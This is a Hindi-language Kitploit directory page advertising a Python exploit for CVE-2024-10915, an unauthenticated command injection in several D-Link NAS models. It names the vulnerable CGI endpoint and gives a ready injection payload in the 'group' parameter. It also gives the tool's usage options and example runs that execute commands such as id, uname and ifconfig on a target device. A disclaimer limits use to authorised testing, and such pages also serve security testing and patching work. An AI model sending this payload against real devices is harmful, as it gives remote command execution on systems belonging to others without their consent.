Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-10915 — # CVE-2024-10915 के लिए Python-आधारित एक्सप्लॉइट यह D-Link NAS उपकरणों में कमांड इंजेक्शन भेद्यता है। `/cgi-bin/account_mgr.cgi` एंडपॉइंट के माध्यम से मनमाने सिस्टम कमांड निष्पादित करता है, जो अधिकृत सुरक्षा परीक्षण के लिए है। | Kitploit
उपकरण/GitHubGitHub/r0otk3r/cve-2024-10915
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंग
GitHubr0otk3r/cve-2024-10915

CVE-2024-10915

# CVE-2024-10915 के लिए Python-आधारित एक्सप्लॉइट यह D-Link NAS उपकरणों में कमांड इंजेक्शन भेद्यता है। `/cgi-bin/account_mgr.cgi` एंडपॉइंट के माध्यम से मनमाने सिस्टम कमांड निष्पादित करता है, जो अधिकृत सुरक्षा परीक्षण के लिए है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-10915 - D-Link NAS कमांड इंजेक्शन एक्सप्लॉइट

यह Python-आधारित एक्सप्लॉइट /cgi-bin/account_mgr.cgi?cmd=cgi_user_add एंडपॉइंट के माध्यम से कई D-Link NAS उत्पादों में कमांड इंजेक्शन भेद्यता को लक्षित करता है। यह भेद्यता बिना प्रमाणीकरण वाले हमलावरों को प्रभावित डिवाइस पर मनमाने सिस्टम कमांड निष्पादित करने की अनुमति देती है।

विवरण

CVE-2024-10915 कई D-Link NAS मॉडलों को प्रभावित करता है। एक हमलावर cgi_user_add कमांड में group पैरामीटर के माध्यम से कमांड इंजेक्ट कर सकता है, जिससे रिमोट कोड निष्पादन होता है।

प्रभावित उत्पाद

  • D-Link DNS-320

  • D-Link DNS-320LW

  • D-Link DNS-325

  • D-Link DNS-340L

root@kitploit:~
कमजोर एंडपॉइंट: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add

उदाहरण:

root@kitploit:~
http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'

आवश्यकताएँ

Python 3.x

  • requests लाइब्रेरी

  • आवश्यक निर्भरताएँ स्थापित करें:

    root@kitploit:~
    pip3 install requests
    

    उपयोग

    root@kitploit:~
    usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]
    
    

    विकल्प:

    विकल्पविवरण
    -u / --urlलक्ष्य बेस URL (जैसे http://192.168.1.100)
    -c / --commandडिवाइस पर निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: id)
    -p / --proxyHTTP प्रॉक्सी का उपयोग करें (जैसे http://127.0.0.1:8080)
    -o / --outputHTTP प्रतिक्रिया को फ़ाइल में सहेजें
    -l / --listप्रभावित D-Link NAS उत्पादों की सूची दिखाएँ

    उदाहरण 1

    root@kitploit:~
    python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt 
    
    id

    उदाहरण 2

    root@kitploit:~
    python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt 
    
    uname

    उदाहरण 3

    root@kitploit:~
    python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt 
    
    ifconfig

    ⚠️ अस्वीकरण

    यह प्रोजेक्ट केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। इस टूल का उपयोग उन नेटवर्कों या सिस्टमों पर न करें जिनके लिए आपके पास स्पष्ट अनुमति नहीं है। लेखक किसी भी दुरुपयोग या हुई क्षति के लिए कोई ज़िम्मेदारी नहीं लेते हैं।


    आधिकारिक चैनल

    • YouTube @rootctf
    • X @r0otk3r
    टूल डाउनलोड करें